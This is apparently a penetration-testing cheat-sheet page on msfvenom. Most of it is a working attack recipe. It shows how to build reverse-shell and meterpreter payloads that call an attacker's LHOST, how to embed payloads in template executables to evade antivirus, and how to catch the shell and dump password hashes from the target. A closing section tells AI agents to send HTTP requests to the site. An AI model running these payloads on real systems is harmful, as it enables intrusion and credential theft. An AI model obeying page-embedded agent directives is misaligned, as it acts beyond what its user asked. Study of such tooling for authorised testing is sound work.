# Msfvenom

{% embed url="<https://www.offsec.com/metasploit-unleashed/msfvenom/>" %}

### General syntax

{% code overflow="wrap" %}

```sh
$ msfvenom --payload <payload> --format <format> --platform <platform> --arch <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> --output <output_file>

# short form options
$ msfvenom -p <payload> -f <format> --platform <platform> -a <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> -o <output_file>
```

{% endcode %}

### Help menu

```bash
$ msfvenom -h
```

### List available options for module type

```bash
$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all
```

### Payload option

```bash
$ msfvenom -p ...

# eg. 
$ msfvenom -p linux/x86/shell_reverse_tcp
```

#### General payload naming convention

`<OS>/<architecture>/<payload>`

1. `OS`: Operating system

* *windows*, *linux*

1. `Architecture`: *x64* or *x86*

* *x86* (32-bit) by default, if not specified

3. `Payload`: *reverse\_tcp*, *bind\_tcp*, etc.

#### Common payloads

**32-bit variant**

1. `windows/shell/reverse_tcp`&#x20;
2. `windows/shell_reverse_tcp`

**64-bit variant**

1. `windows/x64/shell/reverse_tcp` | `linux/x64/shell/reverse_tcp`
2. `windows/x64/shell_reverse_tcp` | `linux/x64/shell_reverse_tcp`
3. `windows/x64/meterpreter/reverse_tcp` | `linux/x64/meterpreter/reverse_tcp`
4. `windows/x64/meterpreter_reverse_tcp` | `linux/x64/meterpreter_reverse_tcp`&#x20;

### Format option

```bash
$ msfvenom -f ...

# eg.
$ msfvenom -f elf
$ msfvenom -f exe
```

***Note***: The output from `msfvenom` provides the shellcode (typically raw machine code) that can be executed on the target architecture, and is defined by the `-p` flag. The `-f` flag simply specifies the format for which the shellcode should be in.

Eg. **Powershell**

`[Byte[]] $buf = 0xfc,0x48,0x83,...`

Eg. **C**

`unsigned char buf[] = "\xfc\x48\x83...`

Eg. **Python**

`buf = b""`&#x20;

`buf += b"\xfc\x48\x8`

`buf += b"\...`

### Template

```sh
$ msfvenom -x ...
$ msfvenom --template ...
```

* can be used to specify a custom executable file to be used as template
* this means that the original functionality of the provided executable file will be fulfilled, but with the addition of the payload specified by an attacker
* may bypass AV, etc.

### CMD

{% code overflow="wrap" %}

```sh
$ msfvenom -p <payload> CMD="xxxx" -f <format> -o <output_file>.exe
```

{% endcode %}

Eg. Generate an x64 Windows `.exe` payload that executes a certain `powershell.exe` command (`CMD` option)

{% code overflow="wrap" %}

```sh
$ msfvenom -p windows/x64/exec CMD="powershell.exe ..." -f exe -o <output_file>.exe
```

{% endcode %}

### Example

`linux/x86/meterpreter/reverse_tcp`

```bash
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf
```

#### Module to use on the attacking machine to catch a shell

`exploit/multi/handler`

```bash
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run
```

#### Run the shellcode on the target machine

```bash
# eg.
$ sudo ./shell.elf
```

#### Gain meterpreter shell on the attacker machine

```
meterpreter >
```

#### Using post exploitation hash dump module&#x20;

```bash
meterpreter > background
msf6 exploit(multi/handler) > sessions -l 

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/linux  ...                    ...

msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...
```

{% embed url="<https://www.offsec.com/metasploit-unleashed/msfvenom/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jarrettgxz-sec.gitbook.io/penetration-testing-ethical-hacking-concepts/vulnerability-and-exploitation/msfvenom.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.